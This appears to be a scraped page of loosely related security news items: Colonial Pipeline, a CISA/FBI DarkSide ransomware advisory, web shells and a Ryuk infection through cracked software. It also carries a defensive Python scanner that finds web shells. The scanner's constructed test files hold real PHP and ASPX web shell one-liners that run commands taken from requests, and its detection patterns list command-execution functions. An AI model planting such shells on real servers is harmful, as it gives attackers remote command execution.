Here is something you never want to hear about your company after a ransomware attack: “I mean, an eighth-grader could have hacked into that system.” Which company was this about? Colonial Pipeline. The person speaking authored a $1.8 million information governance report for the company which uncovered “a patchwork of poorly connected and secured systems.” Is this what led to the successful ransomware attack against the company? The attack left millions of drivers in the eastern U.S., along with airlines and truckers, scrambling to find fuel. And let’s consider another key question. How much action did Colonial Pipeline take to shore up its vulnerabilities following the report? We may never know. Unlike cybersecurity standards that electric providers must adhere…
Government and business both need to step up to combat ransomware attacks against critical systems before they spiral further out of control. The ransomware attack against Colonial Pipeline represents a relatively new and destructive type of threat against critical infrastructure. Beyond the financial and operational hit to the company itself, such an attack threatens to impact millions of people dependent on the safe and quick delivery of gas and oil.
Original release date: May 11, 2021
CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on a ransomware-as-a-service (RaaS) variant—referred to as DarkSide—recently used in a ransomware attack against a critical infrastructure (CI) company.
Cybercriminal groups use DarkSide to gain access to a victim’s network to encrypt and exfiltrate data. These groups then threaten to expose data if the victim does not pay the ransom. Groups leveraging DarkSide have recently been targeting organizations across various CI sectors including manufacturing, legal, insurance, healthcare, and energy.
Prevention is the most effective defense against ransomware. An attack can be devastating to an individual or organization, and recovery can be a long and difficult process, so it is critical to follow best practices to protect against ransomware before it strikes. In addition to the Joint CSA, CISA and FBI urge CI asset owners and operators to review the following resources for best practices on strengthening cybersecurity posture:
- CISA and Multi-State Information Sharing and Analysis Center: Joint Ransomware Guide
- CISA webpage: Ransomware Guidance and Resources
- CISA Insights: Ransomware Outbreak
- CISA Pipeline Cybersecurity Initiative
- CISA Pipeline Cybersecurity Resources Library
Dogecoin has a super-fan in Elon Musk, Ripple pre-mined billions of XRP coins and Tether is a bridge between physical money and cryptocurrencies.
These are the basic Linux network commands every admin should be able to use for troubleshooting network connection problems.
The use of web shells is increasing, which could put your business at risk. Tom Merritt lists five things to know about web shells. Recently, the U.S. FBI was given court authorization to delete web shells from Microsoft Exchange servers. Web shells are a rising menace. They let attackers hide an entry point in your network that’s hard to get rid of. You don’t generally let the FBI go scanning for web shells if it’s an easy fix. Why all the angst? Here are five things to know about web shells.
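The reason a web shell is “hard to get rid of” is that it is just one more file in the web root, often a legitimate page with a few bytes appended, and removing the one you found says nothing about the others. The following is an added example (not code from the article or from Tom Merritt’s list) showing the two checks a responder actually runs over a web root: a pattern scan for code that hands request parameters to an interpreter, and a hash comparison against a known-good baseline, which catches shells that the patterns miss. All file contents, the rule set and the baseline are constructed for the demonstration and are not real samples from any incident.

```python
"""Added example: finding web shells on disk by (a) known-bad code patterns and
(b) drift from a known-good file-hash baseline. Every file below is constructed
for this demonstration; none is a real sample from an incident."""
import hashlib
import re

# Constructed stand-in for a web root: path -> file contents as found on disk.
SAMPLE_FILES = {
    "index.php": "<?php echo 'hello'; ?>",
    "uploads/img.php": "<?php @eval($_POST['cmd']); ?>",          # classic one-liner shell
    "includes/config.php": "<?php $db='x'; ?>",                   # silently modified (see baseline)
    "assets/x.php": "<?php $f=base64_decode('c3lzdGVt'); $f($_GET['c']); ?>",  # obfuscated call
    "old/backup.aspx": '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start(Request["c"]); %>',
}

# Constructed known-good contents; in practice the baseline comes from the
# deployment artifact or a clean snapshot, not from the possibly compromised host.
KNOWN_GOOD = {
    "index.php": "<?php echo 'hello'; ?>",
    "includes/config.php": "<?php $db='y'; ?>",  # differs from what is on disk now
}

# Hypothetical rule set: request input reaching an interpreter or process spawn.
RULES = [
    ("php_eval_request", re.compile(
        r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*.*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("php_base64_decode", re.compile(r"base64_decode\s*\(", re.I)),
    ("php_variable_function", re.compile(r"\$\w+\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("aspx_process_start", re.compile(r"Process\.Start\s*\(.*Request", re.I)),
]


def scan_source(source: str) -> list[str]:
    """Return the names of every rule that matches one file's contents."""
    return [name for name, rx in RULES if rx.search(source)]


def scan_files(files: dict[str, str]) -> dict[str, list[str]]:
    """Pattern-scan every file and report only those with at least one hit."""
    hits = {}
    for path, source in files.items():
        matched = scan_source(source)
        if matched:
            hits[path] = matched
    return hits


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def build_baseline(known_good: dict[str, str]) -> dict[str, str]:
    """Map each known-good path to the hash of its clean contents."""
    return {path: sha256(source) for path, source in known_good.items()}


def find_unexpected(files: dict[str, str], baseline: dict[str, str]) -> dict[str, str]:
    """Report files absent from the baseline ('new') or whose hash changed ('modified').
    This catches shells with no recognisable pattern and legitimate files that
    were edited, which the pattern scan above cannot see."""
    report = {}
    for path, source in files.items():
        if path not in baseline:
            report[path] = "new"
        elif baseline[path] != sha256(source):
            report[path] = "modified"
    return report


if __name__ == "__main__":
    for path, rules in scan_files(SAMPLE_FILES).items():
        print(f"pattern hit  {path}: {', '.join(rules)}")
    for path, status in find_unexpected(SAMPLE_FILES, build_baseline(KNOWN_GOOD)).items():
        print(f"baseline     {path}: {status}")
```

Note what each check misses on its own: the pattern scan flags the three obvious shells but says nothing about `includes/config.php`, while the baseline comparison reports it as modified without knowing whether the change is malicious. Run together, every file that is either suspicious or unexplained gets a look, which is the standard a response team needs before declaring the web root clean.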
Bleeping Computer recently reported that an end user in a research institute –a student in this case– attempted to pirate expensive data visualization software, which resulted in a Ryuk ransomware attack.
We’ve seen ransomware distributed in the past through cryptocurrency miners but this type of ‘crack site’ attack takes ransomware attacks to a whole other level.
The student had searched for data visualization software that they wanted to install at home. Instead of buying a legitimate license, the student searched for a cracked version and downloaded it. The illegal download resulted in an infection with an information-stealing trojan, which captured the credentials the Ryuk operators later used to log into the institute’s network and wreak havoc.
The attack cost the institute a week’s worth of research data and a week-long network outage while servers were rebuilt from scratch and data was restored from backups.